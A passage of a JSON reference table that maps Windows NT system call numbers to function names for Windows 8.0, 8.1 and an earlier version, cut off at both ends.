"NtCreateJobSet", "161": "NtCreateKeyTransacted", "162": "NtCreateKeyedEvent", "163": "NtCreateLowBoxToken", "164": "NtCreateMailslotFile", "165": "NtCreateMutant", "166": "NtCreateNamedPipeFile", "167": "NtCreatePagingFile", "168": "NtCreatePort", "169": "NtCreatePrivateNamespace", "170": "NtCreateProcess", "171": "NtCreateProfile", "172": "NtCreateProfileEx", "173": "NtCreateResourceManager", "174": "NtCreateSemaphore", "175": "NtCreateSymbolicLinkObject", "176": "NtCreateThreadEx", "177": "NtCreateTimer", "178": "NtCreateTimer2", "179": "NtCreateToken", "180": "NtCreateTokenEx", "181": "NtCreateTransaction", "182": "NtCreateTransactionManager", "183": "NtCreateUserProcess", "184": "NtCreateWaitCompletionPacket", "185": "NtCreateWaitablePort", "186": "NtCreateWnfStateName", "187": "NtCreateWorkerFactory", "188": "NtDebugActiveProcess", "189": "NtDebugContinue", "190": "NtDeleteAtom", "191": "NtDeleteBootEntry", "192": "NtDeleteDriverEntry", "193": "NtDeleteFile", "194": "NtDeleteKey", "195": "NtDeleteObjectAuditAlarm", "196": "NtDeletePrivateNamespace", "197": "NtDeleteValueKey", "198": "NtDeleteWnfStateData", "199": "NtDeleteWnfStateName", "200": "NtDisableLastKnownGood", "201": "NtDisplayString", "202": "NtDrawText", "203": "NtEnableLastKnownGood", "204": "NtEnumerateBootEntries", "205": "NtEnumerateDriverEntries", "206": "NtEnumerateSystemEnvironmentValuesEx", "207": "NtEnumerateTransactionObject", "208": "NtExtendSection", "209": "NtFilterBootOption", "210": "NtFilterToken", "211": "NtFilterTokenEx", "212": "NtFlushBuffersFileEx", "213": "NtFlushInstallUILanguage", "214": "NtFlushInstructionCache", "215": "NtFlushKey", "216": "NtFlushProcessWriteBuffers", "217": "NtFlushVirtualMemory", "218": "NtFlushWriteBuffer", "219": "NtFreeUserPhysicalPages", "220": "NtFreezeRegistry", "221": "NtFreezeTransactions", "222": "NtGetCachedSigningLevel", "223": "NtGetCompleteWnfStateSubscription", "224": "NtGetContextThread", "225": "NtGetCurrentProcessorNumber", "226": "NtGetDevicePowerState", "227": "NtGetMUIRegistryInfo", "228": "NtGetNextProcess", "229": "NtGetNextThread", "230": "NtGetNlsSectionPtr", "231": "NtGetNotificationResourceManager", "232": "NtGetWriteWatch", "233": "NtImpersonateAnonymousToken", "234": "NtImpersonateThread", "235": "NtInitializeNlsFiles", "236": "NtInitializeRegistry", "237": "NtInitiatePowerAction", "238": "NtIsSystemResumeAutomatic", "239": "NtIsUILanguageComitted", "240": "NtListenPort", "241": "NtLoadDriver", "242": "NtLoadKey", "243": "NtLoadKey2", "244": "NtLoadKeyEx", "245": "NtLockFile", "246": "NtLockProductActivationKeys", "247": "NtLockRegistryKey", "248": "NtLockVirtualMemory", "249": "NtMakePermanentObject", "250": "NtMakeTemporaryObject", "251": "NtMapCMFModule", "252": "NtMapUserPhysicalPages", "253": "NtModifyBootEntry", "254": "NtModifyDriverEntry", "255": "NtNotifyChangeDirectoryFile", "256": "NtNotifyChangeKey", "257": "NtNotifyChangeMultipleKeys", "258": "NtNotifyChangeSession", "259": "NtOpenEnlistment", "260": "NtOpenEventPair", "261": "NtOpenIoCompletion", "262": "NtOpenJobObject", "263": "NtOpenKeyEx", "264": "NtOpenKeyTransacted", "265": "NtOpenKeyTransactedEx", "266": "NtOpenKeyedEvent", "267": "NtOpenMutant", "268": "NtOpenObjectAuditAlarm", "269": "NtOpenPrivateNamespace", "270": "NtOpenProcessToken", "271": "NtOpenResourceManager", "272": "NtOpenSemaphore", "273": "NtOpenSession", "274": "NtOpenSymbolicLinkObject", "275": "NtOpenThread", "276": "NtOpenTimer", "277": "NtOpenTransaction", "278": "NtOpenTransactionManager", "279": "NtPlugPlayControl", "280": "NtPrePrepareComplete", "281": "NtPrePrepareEnlistment", "282": "NtPrepareComplete", "283": "NtPrepareEnlistment", "284": "NtPrivilegeCheck", "285": "NtPrivilegeObjectAuditAlarm", "286": "NtPrivilegedServiceAuditAlarm", "287": "NtPropagationComplete", "288": "NtPropagationFailed", "289": "NtPulseEvent", "290": "NtQueryBootEntryOrder", "291": "NtQueryBootOptions", "292": "NtQueryDebugFilterState", "293": "NtQueryDirectoryObject", "294": "NtQueryDriverEntryOrder", "295": "NtQueryEaFile", "296": "NtQueryFullAttributesFile", "297": "NtQueryInformationAtom", "298": "NtQueryInformationEnlistment", "299": "NtQueryInformationJobObject", "300": "NtQueryInformationPort", "301": "NtQueryInformationResourceManager", "302": "NtQueryInformationTransaction", "303": "NtQueryInformationTransactionManager", "304": "NtQueryInformationWorkerFactory", "305": "NtQueryInstallUILanguage", "306": "NtQueryIntervalProfile", "307": "NtQueryIoCompletion", "308": "NtQueryLicenseValue", "309": "NtQueryMultipleValueKey", "310": "NtQueryMutant", "311": "NtQueryOpenSubKeys", "312": "NtQueryOpenSubKeysEx", "313": "NtQueryPortInformationProcess", "314": "NtQueryQuotaInformationFile", "315": "NtQuerySecurityAttributesToken", "316": "NtQuerySecurityObject", "317": "NtQuerySemaphore", "318": "NtQuerySymbolicLinkObject", "319": "NtQuerySystemEnvironmentValue", "320": "NtQuerySystemEnvironmentValueEx", "321": "NtQuerySystemInformationEx", "322": "NtQueryTimerResolution", "323": "NtQueryWnfStateData", "324": "NtQueryWnfStateNameInformation", "325": "NtQueueApcThreadEx", "326": "NtRaiseException", "327": "NtRaiseHardError", "328": "NtReadOnlyEnlistment", "329": "NtRecoverEnlistment", "330": "NtRecoverResourceManager", "331": "NtRecoverTransactionManager", "332": "NtRegisterProtocolAddressInformation", "333": "NtRegisterThreadTerminatePort", "334": "NtReleaseKeyedEvent", "335": "NtReleaseWorkerFactoryWorker", "336": "NtRemoveIoCompletionEx", "337": "NtRemoveProcessDebug", "338": "NtRenameKey", "339": "NtRenameTransactionManager", "340": "NtReplaceKey", "341": "NtReplacePartitionUnit", "342": "NtReplyWaitReplyPort", "343": "NtRequestPort", "344": "NtResetEvent", "345": "NtResetWriteWatch", "346": "NtRestoreKey", "347": "NtResumeProcess", "348": "NtRollbackComplete", "349": "NtRollbackEnlistment", "350": "NtRollbackTransaction", "351": "NtRollforwardTransactionManager", "352": "NtSaveKey", "353": "NtSaveKeyEx", "354": "NtSaveMergedKeys", "355": "NtSecureConnectPort", "356": "NtSerializeBoot", "357": "NtSetBootEntryOrder", "358": "NtSetBootOptions", "359": "NtSetCachedSigningLevel", "360": "NtSetContextThread", "361": "NtSetDebugFilterState", "362": "NtSetDefaultHardErrorPort", "363": "NtSetDefaultLocale", "364": "NtSetDefaultUILanguage", "365": "NtSetDriverEntryOrder", "366": "NtSetEaFile", "367": "NtSetHighEventPair", "368": "NtSetHighWaitLowEventPair", "369": "NtSetIRTimer", "370": "NtSetInformationDebugObject", "371": "NtSetInformationEnlistment", "372": "NtSetInformationJobObject", "373": "NtSetInformationKey", "374": "NtSetInformationResourceManager", "375": "NtSetInformationToken", "376": "NtSetInformationTransaction", "377": "NtSetInformationTransactionManager", "378": "NtSetInformationVirtualMemory", "379": "NtSetInformationWorkerFactory", "380": "NtSetIntervalProfile", "381": "NtSetIoCompletion", "382": "NtSetIoCompletionEx", "383": "NtSetLdtEntries", "384": "NtSetLowEventPair", "385": "NtSetLowWaitHighEventPair", "386": "NtSetQuotaInformationFile", "387": "NtSetSecurityObject", "388": "NtSetSystemEnvironmentValue", "389": "NtSetSystemEnvironmentValueEx", "390": "NtSetSystemInformation", "391": "NtSetSystemPowerState", "392": "NtSetSystemTime", "393": "NtSetThreadExecutionState", "394": "NtSetTimer2", "395": "NtSetTimerEx", "396": "NtSetTimerResolution", "397": "NtSetUuidSeed", "398": "NtSetVolumeInformationFile", "399": "NtSetWnfProcessNotificationEvent", "400": "NtShutdownSystem", "401": "NtShutdownWorkerFactory", "402": "NtSignalAndWaitForSingleObject", "403": "NtSinglePhaseReject", "404": "NtStartProfile", "405": "NtStopProfile", "406": "NtSubscribeWnfStateChange", "407": "NtSuspendProcess", "408": "NtSuspendThread", "409": "NtSystemDebugControl", "410": "NtTerminateJobObject", "411": "NtTestAlert", "412": "NtThawRegistry", "413": "NtThawTransactions", "414": "NtTraceControl", "415": "NtTranslateFilePath", "416": "NtUmsThreadYield", "417": "NtUnloadDriver", "418": "NtUnloadKey", "419": "NtUnloadKey2", "420": "NtUnloadKeyEx", "421": "NtUnlockFile", "422": "NtUnlockVirtualMemory", "423": "NtUnmapViewOfSectionEx", "424": "NtUnsubscribeWnfStateChange", "425": "NtUpdateWnfStateData", "426": "NtVdmControl", "427": "NtWaitForAlertByThreadId", "428": "NtWaitForDebugEvent", "429": "NtWaitForKeyedEvent", "430": "NtWaitForWorkViaWorkerFactory", "431": "NtWaitHighEventPair", "432": "NtWaitLowEventPair"}}, "Windows 8": {"8.0": {"0": "NtWorkerFactoryWorkerReady", "1": "NtMapUserPhysicalPagesScatter", "2": "NtWaitForSingleObject", "3": "NtCallbackReturn", "4": "NtReadFile", "5": "NtDeviceIoControlFile", "6": "NtWriteFile", "7": "NtRemoveIoCompletion", "8": "NtReleaseSemaphore", "9": "NtReplyWaitReceivePort", "10": "NtReplyPort", "11": "NtSetInformationThread", "12": "NtSetEvent", "13": "NtClose", "14": "NtQueryObject", "15": "NtQueryInformationFile", "16": "NtOpenKey", "17": "NtEnumerateValueKey", "18": "NtFindAtom", "19": "NtQueryDefaultLocale", "20": "NtQueryKey", "21": "NtQueryValueKey", "22": "NtAllocateVirtualMemory", "23": "NtQueryInformationProcess", "24": "NtWaitForMultipleObjects32", "25": "NtWriteFileGather", "26": "NtSetInformationProcess", "27": "NtCreateKey", "28": "NtFreeVirtualMemory", "29": "NtImpersonateClientOfPort", "30": "NtReleaseMutant", "31": "NtQueryInformationToken", "32": "NtRequestWaitReplyPort", "33": "NtQueryVirtualMemory", "34": "NtOpenThreadToken", "35": "NtQueryInformationThread", "36": "NtOpenProcess", "37": "NtSetInformationFile", "38": "NtMapViewOfSection", "39": "NtAccessCheckAndAuditAlarm", "40": "NtUnmapViewOfSection", "41": "NtReplyWaitReceivePortEx", "42": "NtTerminateProcess", "43": "NtSetEventBoostPriority", "44": "NtReadFileScatter", "45": "NtOpenThreadTokenEx", "46": "NtOpenProcessTokenEx", "47": "NtQueryPerformanceCounter", "48": "NtEnumerateKey", "49": "NtOpenFile", "50": "NtDelayExecution", "51": "NtQueryDirectoryFile", "52": "NtQuerySystemInformation", "53": "NtOpenSection", "54": "NtQueryTimer", "55": "NtFsControlFile", "56": "NtWriteVirtualMemory", "57": "NtCloseObjectAuditAlarm", "58": "NtDuplicateObject", "59": "NtQueryAttributesFile", "60": "NtClearEvent", "61": "NtReadVirtualMemory", "62": "NtOpenEvent", "63": "NtAdjustPrivilegesToken", "64": "NtDuplicateToken", "65": "NtContinue", "66": "NtQueryDefaultUILanguage", "67": "NtQueueApcThread", "68": "NtYieldExecution", "69": "NtAddAtom", "70": "NtCreateEvent", "71": "NtQueryVolumeInformationFile", "72": "NtCreateSection", "73": "NtFlushBuffersFile", "74": "NtApphelpCacheControl", "75": "NtCreateProcessEx", "76": "NtCreateThread", "77": "NtIsProcessInJob", "78": "NtProtectVirtualMemory", "79": "NtQuerySection", "80": "NtResumeThread", "81": "NtTerminateThread", "82": "NtReadRequestData", "83": "NtCreateFile", "84": "NtQueryEvent", "85": "NtWriteRequestData", "86": "NtOpenDirectoryObject", "87": "NtAccessCheckByTypeAndAuditAlarm", "88": "NtQuerySystemTime", "89": "NtWaitForMultipleObjects", "90": "NtSetInformationObject", "91": "NtCancelIoFile", "92": "NtTraceEvent", "93": "NtPowerInformation", "94": "NtSetValueKey", "95": "NtCancelTimer", "96": "NtSetTimer", "97": "NtAcceptConnectPort", "98": "NtAccessCheck", "99": "NtAccessCheckByType", "100": "NtAccessCheckByTypeResultList", "101": "NtAccessCheckByTypeResultListAndAuditAlarm", "102": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "103": "NtAddAtomEx", "104": "NtAddBootEntry", "105": "NtAddDriverEntry", "106": "NtAdjustGroupsToken", "107": "NtAdjustTokenClaimsAndDeviceGroups", "108": "NtAlertResumeThread", "109": "NtAlertThread", "110": "NtAlertThreadByThreadId", "111": "NtAllocateLocallyUniqueId", "112": "NtAllocateReserveObject", "113": "NtAllocateUserPhysicalPages", "114": "NtAllocateUuids", "115": "NtAlpcAcceptConnectPort", "116": "NtAlpcCancelMessage", "117": "NtAlpcConnectPort", "118": "NtAlpcConnectPortEx", "119": "NtAlpcCreatePort", "120": "NtAlpcCreatePortSection", "121": "NtAlpcCreateResourceReserve", "122": "NtAlpcCreateSectionView", "123": "NtAlpcCreateSecurityContext", "124": "NtAlpcDeletePortSection", "125": "NtAlpcDeleteResourceReserve", "126": "NtAlpcDeleteSectionView", "127": "NtAlpcDeleteSecurityContext", "128": "NtAlpcDisconnectPort", "129": "NtAlpcImpersonateClientOfPort", "130": "NtAlpcOpenSenderProcess", "131": "NtAlpcOpenSenderThread", "132": "NtAlpcQueryInformation", "133": "NtAlpcQueryInformationMessage", "134": "NtAlpcRevokeSecurityContext", "135": "NtAlpcSendWaitReceivePort", "136": "NtAlpcSetInformation", "137": "NtAreMappedFilesTheSame", "138": "NtAssignProcessToJobObject", "139": "NtAssociateWaitCompletionPacket", "140": "NtCancelIoFileEx", "141": "NtCancelSynchronousIoFile", "142": "NtCancelWaitCompletionPacket", "143": "NtCommitComplete", "144": "NtCommitEnlistment", "145": "NtCommitTransaction", "146": "NtCompactKeys", "147": "NtCompareTokens", "148": "NtCompleteConnectPort", "149": "NtCompressKey", "150": "NtConnectPort", "151": "NtCreateDebugObject", "152": "NtCreateDirectoryObject", "153": "NtCreateDirectoryObjectEx", "154": "NtCreateEnlistment", "155": "NtCreateEventPair", "156": "NtCreateIRTimer", "157": "NtCreateIoCompletion", "158": "NtCreateJobObject", "159": "NtCreateJobSet", "160": "NtCreateKeyTransacted", "161": "NtCreateKeyedEvent", "162": "NtCreateLowBoxToken", "163": "NtCreateMailslotFile", "164": "NtCreateMutant", "165": "NtCreateNamedPipeFile", "166": "NtCreatePagingFile", "167": "NtCreatePort", "168": "NtCreatePrivateNamespace", "169": "NtCreateProcess", "170": "NtCreateProfile", "171": "NtCreateProfileEx", "172": "NtCreateResourceManager", "173": "NtCreateSemaphore", "174": "NtCreateSymbolicLinkObject", "175": "NtCreateThreadEx", "176": "NtCreateTimer", "177": "NtCreateToken", "178": "NtCreateTokenEx", "179": "NtCreateTransaction", "180": "NtCreateTransactionManager", "181": "NtCreateUserProcess", "182": "NtCreateWaitCompletionPacket", "183": "NtCreateWaitablePort", "184": "NtCreateWnfStateName", "185": "NtCreateWorkerFactory", "186": "NtDebugActiveProcess", "187": "NtDebugContinue", "188": "NtDeleteAtom", "189": "NtDeleteBootEntry", "190": "NtDeleteDriverEntry", "191": "NtDeleteFile", "192": "NtDeleteKey", "193": "NtDeleteObjectAuditAlarm", "194": "NtDeletePrivateNamespace", "195": "NtDeleteValueKey", "196": "NtDeleteWnfStateData", "197": "NtDeleteWnfStateName", "198": "NtDisableLastKnownGood", "199": "NtDisplayString", "200": "NtDrawText", "201": "NtEnableLastKnownGood", "202": "NtEnumerateBootEntries", "203": "NtEnumerateDriverEntries", "204": "NtEnumerateSystemEnvironmentValuesEx", "205": "NtEnumerateTransactionObject", "206": "NtExtendSection", "207": "NtFilterBootOption", "208": "NtFilterToken", "209": "NtFilterTokenEx", "210": "NtFlushBuffersFileEx", "211": "NtFlushInstallUILanguage", "212": "NtFlushInstructionCache", "213": "NtFlushKey", "214": "NtFlushProcessWriteBuffers", "215": "NtFlushVirtualMemory", "216": "NtFlushWriteBuffer", "217": "NtFreeUserPhysicalPages", "218": "NtFreezeRegistry", "219": "NtFreezeTransactions", "220": "NtGetCachedSigningLevel", "221": "NtGetContextThread", "222": "NtGetCurrentProcessorNumber", "223": "NtGetDevicePowerState", "224": "NtGetMUIRegistryInfo", "225": "NtGetNextProcess", "226": "NtGetNextThread", "227": "NtGetNlsSectionPtr", "228": "NtGetNotificationResourceManager", "229": "NtGetWriteWatch", "230": "NtImpersonateAnonymousToken", "231": "NtImpersonateThread", "232": "NtInitializeNlsFiles", "233": "NtInitializeRegistry", "234": "NtInitiatePowerAction", "235": "NtIsSystemResumeAutomatic", "236": "NtIsUILanguageComitted", "237": "NtListenPort", "238": "NtLoadDriver", "239": "NtLoadKey", "240": "NtLoadKey2", "241": "NtLoadKeyEx", "242": "NtLockFile", "243": "NtLockProductActivationKeys", "244": "NtLockRegistryKey", "245": "NtLockVirtualMemory", "246": "NtMakePermanentObject", "247": "NtMakeTemporaryObject", "248": "NtMapCMFModule", "249": "NtMapUserPhysicalPages", "250": "NtModifyBootEntry", "251": "NtModifyDriverEntry", "252": "NtNotifyChangeDirectoryFile", "253": "NtNotifyChangeKey", "254": "NtNotifyChangeMultipleKeys", "255": "NtNotifyChangeSession", "256": "NtOpenEnlistment", "257": "NtOpenEventPair", "258": "NtOpenIoCompletion", "259": "NtOpenJobObject", "260": "NtOpenKeyEx", "261": "NtOpenKeyTransacted", "262": "NtOpenKeyTransactedEx", "263": "NtOpenKeyedEvent", "264": "NtOpenMutant", "265": "NtOpenObjectAuditAlarm", "266": "NtOpenPrivateNamespace", "267": "NtOpenProcessToken", "268": "NtOpenResourceManager", "269": "NtOpenSemaphore", "270": "NtOpenSession", "271": "NtOpenSymbolicLinkObject", "272": "NtOpenThread", "273": "NtOpenTimer", "274": "NtOpenTransaction", "275": "NtOpenTransactionManager", "276": "NtPlugPlayControl", "277": "NtPrePrepareComplete", "278": "NtPrePrepareEnlistment", "279": "NtPrepareComplete", "280": "NtPrepareEnlistment", "281": "NtPrivilegeCheck", "282": "NtPrivilegeObjectAuditAlarm", "283": "NtPrivilegedServiceAuditAlarm", "284": "NtPropagationComplete", "285": "NtPropagationFailed", "286": "NtPulseEvent", "287": "NtQueryBootEntryOrder", "288": "NtQueryBootOptions", "289": "NtQueryDebugFilterState", "290": "NtQueryDirectoryObject", "291": "NtQueryDriverEntryOrder", "292": "NtQueryEaFile", "293": "NtQueryFullAttributesFile", "294": "NtQueryInformationAtom", "295": "NtQueryInformationEnlistment", "296": "NtQueryInformationJobObject", "297": "NtQueryInformationPort", "298": "NtQueryInformationResourceManager", "299": "NtQueryInformationTransaction", "300": "NtQueryInformationTransactionManager", "301": "NtQueryInformationWorkerFactory", "302": "NtQueryInstallUILanguage", "303": "NtQueryIntervalProfile", "304": "NtQueryIoCompletion", "305": "NtQueryLicenseValue", "306": "NtQueryMultipleValueKey", "307": "NtQueryMutant", "308": "NtQueryOpenSubKeys", "309": "NtQueryOpenSubKeysEx", "310": "NtQueryPortInformationProcess", "311": "NtQueryQuotaInformationFile", "312": "NtQuerySecurityAttributesToken", "313": "NtQuerySecurityObject", "314": "NtQuerySemaphore", "315": "NtQuerySymbolicLinkObject", "316": "NtQuerySystemEnvironmentValue", "317": "NtQuerySystemEnvironmentValueEx", "318": "NtQuerySystemInformationEx", "319": "NtQueryTimerResolution", "320": "NtQueryWnfStateData", "321": "NtQueryWnfStateNameInformation", "322": "NtQueueApcThreadEx", "323": "NtRaiseException", "324": "NtRaiseHardError", "325": "NtReadOnlyEnlistment", "326": "NtRecoverEnlistment", "327": "NtRecoverResourceManager", "328": "NtRecoverTransactionManager", "329": "NtRegisterProtocolAddressInformation", "330": "NtRegisterThreadTerminatePort", "331": "NtReleaseKeyedEvent", "332": "NtReleaseWorkerFactoryWorker", "333": "NtRemoveIoCompletionEx", "334": "NtRemoveProcessDebug", "335": "NtRenameKey", "336": "NtRenameTransactionManager", "337": "NtReplaceKey", "338": "NtReplacePartitionUnit", "339": "NtReplyWaitReplyPort", "340": "NtRequestPort", "341": "NtResetEvent", "342": "NtResetWriteWatch", "343": "NtRestoreKey", "344": "NtResumeProcess", "345": "NtRollbackComplete", "346": "NtRollbackEnlistment", "347": "NtRollbackTransaction", "348": "NtRollforwardTransactionManager", "349": "NtSaveKey", "350": "NtSaveKeyEx", "351": "NtSaveMergedKeys", "352": "NtSecureConnectPort", "353": "NtSerializeBoot", "354": "NtSetBootEntryOrder", "355": "NtSetBootOptions", "356": "NtSetCachedSigningLevel", "357": "NtSetContextThread", "358": "NtSetDebugFilterState", "359": "NtSetDefaultHardErrorPort", "360": "NtSetDefaultLocale", "361": "NtSetDefaultUILanguage", "362": "NtSetDriverEntryOrder", "363": "NtSetEaFile", "364": "NtSetHighEventPair", "365": "NtSetHighWaitLowEventPair", "366": "NtSetIRTimer", "367": "NtSetInformationDebugObject", "368": "NtSetInformationEnlistment", "369": "NtSetInformationJobObject", "370": "NtSetInformationKey", "371": "NtSetInformationResourceManager", "372": "NtSetInformationToken", "373": "NtSetInformationTransaction", "374": "NtSetInformationTransactionManager", "375": "NtSetInformationVirtualMemory", "376": "NtSetInformationWorkerFactory", "377": "NtSetIntervalProfile", "378": "NtSetIoCompletion", "379": "NtSetIoCompletionEx", "380": "NtSetLdtEntries", "381": "NtSetLowEventPair", "382": "NtSetLowWaitHighEventPair", "383": "NtSetQuotaInformationFile", "384": "NtSetSecurityObject", "385": "NtSetSystemEnvironmentValue", "386": "NtSetSystemEnvironmentValueEx", "387": "NtSetSystemInformation", "388": "NtSetSystemPowerState", "389": "NtSetSystemTime", "390": "NtSetThreadExecutionState", "391": "NtSetTimerEx", "392": "NtSetTimerResolution", "393": "NtSetUuidSeed", "394": "NtSetVolumeInformationFile", "395": "NtShutdownSystem", "396": "NtShutdownWorkerFactory", "397": "NtSignalAndWaitForSingleObject", "398": "NtSinglePhaseReject", "399": "NtStartProfile", "400": "NtStopProfile", "401": "NtSubscribeWnfStateChange", "402": "NtSuspendProcess", "403": "NtSuspendThread", "404": "NtSystemDebugControl", "405": "NtTerminateJobObject", "406": "NtTestAlert", "407": "NtThawRegistry", "408": "NtThawTransactions", "409": "NtTraceControl", "410": "NtTranslateFilePath", "411": "NtUmsThreadYield", "412": "NtUnloadDriver", "413": "NtUnloadKey", "414": "NtUnloadKey2", "415": "NtUnloadKeyEx", "416": "NtUnlockFile", "417": "NtUnlockVirtualMemory", "418": "NtUnmapViewOfSectionEx", "419": "NtUnsubscribeWnfStateChange", "420": "NtUpdateWnfStateData", "421": "NtVdmControl", "422": "NtWaitForAlertByThreadId", "423": "NtWaitForDebugEvent", "424": "NtWaitForKeyedEvent", "425": "NtWaitForWnfNotifications", "426": "NtWaitForWorkViaWorkerFactory", "427": "NtWaitHighEventPair", "428": "NtWaitLowEventPair"}, "8.1": {"0": "NtWorkerFactoryWorkerReady", "1": "NtAcceptConnectPort", "2": "NtMapUserPhysicalPagesScatter", "3": "NtWaitForSingleObject", "4": "NtCallbackReturn", "5": "NtReadFile", "6": "NtDeviceIoControlFile", "7": "NtWriteFile", "8": "NtRemoveIoCompletion", "9": "NtReleaseSemaphore", "10": "NtReplyWaitReceivePort", "11": "NtReplyPort", "12": "NtSetInformationThread", "13": "NtSetEvent", "14": "NtClose", "15": "NtQueryObject", "16": "NtQueryInformationFile", "17": "NtOpenKey", "18": "NtEnumerateValueKey", "19": "NtFindAtom", "20": "NtQueryDefaultLocale", "21": "NtQueryKey", "22": "NtQueryValueKey", "23": "NtAllocateVirtualMemory", "24": "NtQueryInformationProcess", "25": "NtWaitForMultipleObjects32", "26": "NtWriteFileGather", "27": "NtSetInformationProcess", "28": "NtCreateKey", "29": "NtFreeVirtualMemory", "30": "NtImpersonateClientOfPort", "31": "NtReleaseMutant", "32": "NtQueryInformationToken", "33": "NtRequestWaitReplyPort", "34": "NtQueryVirtualMemory", "35": "NtOpenThreadToken", "36": "NtQueryInformationThread", "37": "NtOpenProcess", "38": "NtSetInformationFile", "39": "NtMapViewOfSection", "40": "NtAccessCheckAndAuditAlarm", "41": "NtUnmapViewOfSection", "42": "NtReplyWaitReceivePortEx", "43": "NtTerminateProcess", "44": "NtSetEventBoostPriority", "45": "NtReadFileScatter", "46": "NtOpenThreadTokenEx", "47": "NtOpenProcessTokenEx", "48": "NtQueryPerformanceCounter", "49": "NtEnumerateKey", "50": "NtOpenFile", "51": "NtDelayExecution", "52": "NtQueryDirectoryFile", "53": "NtQuerySystemInformation", "54": "NtOpenSection", "55": "NtQueryTimer", "56": "NtFsControlFile", "57": "NtWriteVirtualMemory", "58": "NtCloseObjectAuditAlarm", "59": "NtDuplicateObject", "60": "NtQueryAttributesFile", "61": "NtClearEvent", "62": "NtReadVirtualMemory", "63": "NtOpenEvent", "64": "NtAdjustPrivilegesToken", "65": "NtDuplicateToken", "66": "NtContinue", "67": "NtQueryDefaultUILanguage", "68": "NtQueueApcThread", "69": "NtYieldExecution", "70": "NtAddAtom", "71": "NtCreateEvent", "72": "NtQueryVolumeInformationFile", "73": "NtCreateSection", "74": "NtFlushBuffersFile", "75": "NtApphelpCacheControl", "76": "NtCreateProcessEx", "77": "NtCreateThread", "78": "NtIsProcessInJob", "79": "NtProtectVirtualMemory", "80": "NtQuerySection", "81": "NtResumeThread", "82": "NtTerminateThread", "83": "NtReadRequestData", "84": "NtCreateFile", "85": "NtQueryEvent", "86": "NtWriteRequestData", "87": "NtOpenDirectoryObject", "88": "NtAccessCheckByTypeAndAuditAlarm", "89": "NtQuerySystemTime", "90": "NtWaitForMultipleObjects", "91": "NtSetInformationObject", "92": "NtCancelIoFile", "93": "NtTraceEvent", "94": "NtPowerInformation", "95": "NtSetValueKey", "96": "NtCancelTimer", "97": "NtSetTimer", "98": "NtAccessCheck", "99": "NtAccessCheckByType", "100": "NtAccessCheckByTypeResultList", "101": "NtAccessCheckByTypeResultListAndAuditAlarm", "102": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "103": "NtAddAtomEx", "104": "NtAddBootEntry", "105": "NtAddDriverEntry", "106": "NtAdjustGroupsToken", "107": "NtAdjustTokenClaimsAndDeviceGroups", "108": "NtAlertResumeThread", "109": "NtAlertThread", "110": "NtAlertThreadByThreadId", "111": "NtAllocateLocallyUniqueId", "112": "NtAllocateReserveObject", "113": "NtAllocateUserPhysicalPages", "114": "NtAllocateUuids", "115": "NtAlpcAcceptConnectPort", "116": "NtAlpcCancelMessage", "117": "NtAlpcConnectPort", "118": "NtAlpcConnectPortEx", "119": "NtAlpcCreatePort", "120": "NtAlpcCreatePortSection", "121": "NtAlpcCreateResourceReserve", "122": "NtAlpcCreateSectionView", "123": "NtAlpcCreateSecurityContext", "124": "NtAlpcDeletePortSection", "125": "NtAlpcDeleteResourceReserve", "126": "NtAlpcDeleteSectionView", "127": "NtAlpcDeleteSecurityContext", "128": "NtAlpcDisconnectPort", "129": "NtAlpcImpersonateClientOfPort", "130": "NtAlpcOpenSenderProcess", "131": "NtAlpcOpenSenderThread", "132": "NtAlpcQueryInformation", "133": "NtAlpcQueryInformationMessage", "134": "NtAlpcRevokeSecurityContext", "135": "NtAlpcSendWaitReceivePort", "136": "NtAlpcSetInformation", "137": "NtAreMappedFilesTheSame", "138": "NtAssignProcessToJobObject", "139": "NtAssociateWaitCompletionPacket", "140": "NtCancelIoFileEx", "141": "NtCancelSynchronousIoFile", "142": "NtCancelTimer2", "143": "NtCancelWaitCompletionPacket", "144": "NtCommitComplete", "145": "NtCommitEnlistment", "146": "NtCommitTransaction", "147": "NtCompactKeys", "148": "NtCompareTokens", "149": "NtCompleteConnectPort", "150": "NtCompressKey", "151": "NtConnectPort", "152": "NtCreateDebugObject", "153": "NtCreateDirectoryObject", "154": "NtCreateDirectoryObjectEx", "155": "NtCreateEnlistment", "156": "NtCreateEventPair", "157": "NtCreateIRTimer", "158": "NtCreateIoCompletion", "159": "NtCreateJobObject", "160": "NtCreateJobSet", "161": "NtCreateKeyTransacted", "162": "NtCreateKeyedEvent", "163": "NtCreateLowBoxToken", "164": "NtCreateMailslotFile", "165": "NtCreateMutant", "166": "NtCreateNamedPipeFile", "167": "NtCreatePagingFile", "168": "NtCreatePort", "169": "NtCreatePrivateNamespace", "170": "NtCreateProcess", "171": "NtCreateProfile", "172": "NtCreateProfileEx", "173": "NtCreateResourceManager", "174": "NtCreateSemaphore", "175": "NtCreateSymbolicLinkObject", "176": "NtCreateThreadEx", "177": "NtCreateTimer", "178": "NtCreateTimer2", "179": "NtCreateToken", "180": "NtCreateTokenEx", "181": "NtCreateTransaction", "182": "NtCreateTransactionManager", "183": "NtCreateUserProcess", "184": "NtCreateWaitCompletionPacket", "185": "NtCreateWaitablePort", "186": "NtCreateWnfStateName", "187": "NtCreateWorkerFactory", "188": "NtDebugActiveProcess", "189": "NtDebugContinue", "190": "NtDeleteAtom", "191": "NtDeleteBootEntry", "192": "NtDeleteDriverEntry", "193": "NtDeleteFile", "194": "NtDeleteKey", "195": "NtDeleteObjectAuditAlarm", "196": "NtDeletePrivateNamespace", "197": "NtDeleteValueKey", "198": "NtDeleteWnfStateData", "199": "NtDeleteWnfStateName", "200": "NtDisableLastKnownGood", "201": "NtDisplayString", "202": "NtDrawText", "203": "NtEnableLastKnownGood", "204": "NtEnumerateBootEntries", "205": "NtEnumerateDriverEntries", "206": "NtEnumerateSystemEnvironmentValuesEx", "207": "NtEnumerateTransactionObject", "208": "NtExtendSection", "209": "NtFilterBootOption", "210": "NtFilterToken", "211": "NtFilterTokenEx", "212": "NtFlushBuffersFileEx", "213": "NtFlushInstallUILanguage", "214": "NtFlushInstructionCache", "215": "NtFlushKey", "216": "NtFlushProcessWriteBuffers", "217": "NtFlushVirtualMemory", "218": "NtFlushWriteBuffer", "219": "NtFreeUserPhysicalPages", "220": "NtFreezeRegistry", "221": "NtFreezeTransactions", "222": "NtGetCachedSigningLevel", "223": "NtGetCompleteWnfStateSubscription", "224": "NtGetContextThread", "225": "NtGetCurrentProcessorNumber", "226": "NtGetDevicePowerState", "227": "NtGetMUIRegistryInfo", "228": "NtGetNextProcess", "229": 